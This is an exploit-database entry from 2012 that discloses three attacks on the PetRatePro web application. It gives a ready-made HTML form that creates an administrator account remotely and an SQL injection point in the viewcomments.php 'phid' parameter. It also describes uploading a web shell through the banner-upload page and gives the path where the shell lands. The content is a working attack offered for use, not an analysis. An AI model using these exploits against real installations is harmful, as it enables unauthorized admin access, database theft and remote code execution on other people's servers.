Auxilium PetRatePro Multiple Vulnerabilities

2012-09-15T00:00:00
ID 1337DAY-ID-19414
Type zdt
Reporter DaOne
Modified 2012-09-15T00:00:00

Description

Exploit for linux platform in category web applications

                                        
                                            ##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username
<input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">           
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">                           
</form>



[#] 2-[SQL Injection]

viewcomments.php parameter phid

http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]



[#] 3-[Remote File Upload]

Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your Shell...
will find files here ... /PetRatePro/banners/shell.php


##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################



#  0day.today [2018-03-13]  #